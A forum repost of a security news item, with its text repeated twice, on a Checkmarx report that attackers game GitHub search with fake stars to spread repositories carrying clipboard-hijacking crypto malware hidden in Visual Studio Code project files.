Father
Professional
- Messages
- 2,601
- Reaction score
- 832
- Points
- 113
Fake stars lull unsuspecting developers to sleep.
Hackers have started using the search function on GitHub to trick users who search for popular repositories, forcing them to download fake packages containing malware.
The latest attack on the open source software supply chain was reported by Checkmarx, noting that malicious code is hidden in Microsoft Visual Code project files and is designed to download subsequent stages of malware from remote URLs.
According to security researcher Yehuda Gelb, criminals create malicious repositories with popular names and topics, using automated updates and fake stars (a local quality criterion) to increase their search rankings, misleading users. This action gives illegal repositories a semblance of legitimacy, deceiving developers and forcing them to upload.
Checkmarx experts quickly found services on the darknet to promote the aforementioned stars for money. In previous scam campaigns, attackers added hundreds or thousands of stars to their repositories, but in recent attacks, they chose a more modest number of stars, probably so as not to arouse suspicion or save money.
Many of the fake repositories disguise themselves as legitimate projects related to popular games and tools, making it harder to distinguish them from secure code.
Experts have also observed that some repositories upload an encrypted ".7z " file with an executable file "feedbackAPI.exe", with a size of 750 MB. Such a large size is probably due to the anti-virus scanning rim measures.
Eventually, malware is launched that replaces the addresses of cryptocurrency wallets copied to the clipboard with addresses controlled by attackers. According to Checkmarx, this malicious software has some similarities with the well-known Keyzetsu clipper, but it is not one hundred percent such.
The discovery of the researchers emphasizes that it is extremely important for developers to carefully check the source code when downloading it from open repositories, and also not rely only on the reputation of the repository, since it can be easily forged.
Hackers have started using the search function on GitHub to trick users who search for popular repositories, forcing them to download fake packages containing malware.
The latest attack on the open source software supply chain was reported by Checkmarx, noting that malicious code is hidden in Microsoft Visual Code project files and is designed to download subsequent stages of malware from remote URLs.
According to security researcher Yehuda Gelb, criminals create malicious repositories with popular names and topics, using automated updates and fake stars (a local quality criterion) to increase their search rankings, misleading users. This action gives illegal repositories a semblance of legitimacy, deceiving developers and forcing them to upload.
Checkmarx experts quickly found services on the darknet to promote the aforementioned stars for money. In previous scam campaigns, attackers added hundreds or thousands of stars to their repositories, but in recent attacks, they chose a more modest number of stars, probably so as not to arouse suspicion or save money.
Many of the fake repositories disguise themselves as legitimate projects related to popular games and tools, making it harder to distinguish them from secure code.
Experts have also observed that some repositories upload an encrypted ".7z " file with an executable file "feedbackAPI.exe", with a size of 750 MB. Such a large size is probably due to the anti-virus scanning rim measures.
Eventually, malware is launched that replaces the addresses of cryptocurrency wallets copied to the clipboard with addresses controlled by attackers. According to Checkmarx, this malicious software has some similarities with the well-known Keyzetsu clipper, but it is not one hundred percent such.
The discovery of the researchers emphasizes that it is extremely important for developers to carefully check the source code when downloading it from open repositories, and also not rely only on the reputation of the repository, since it can be easily forged.
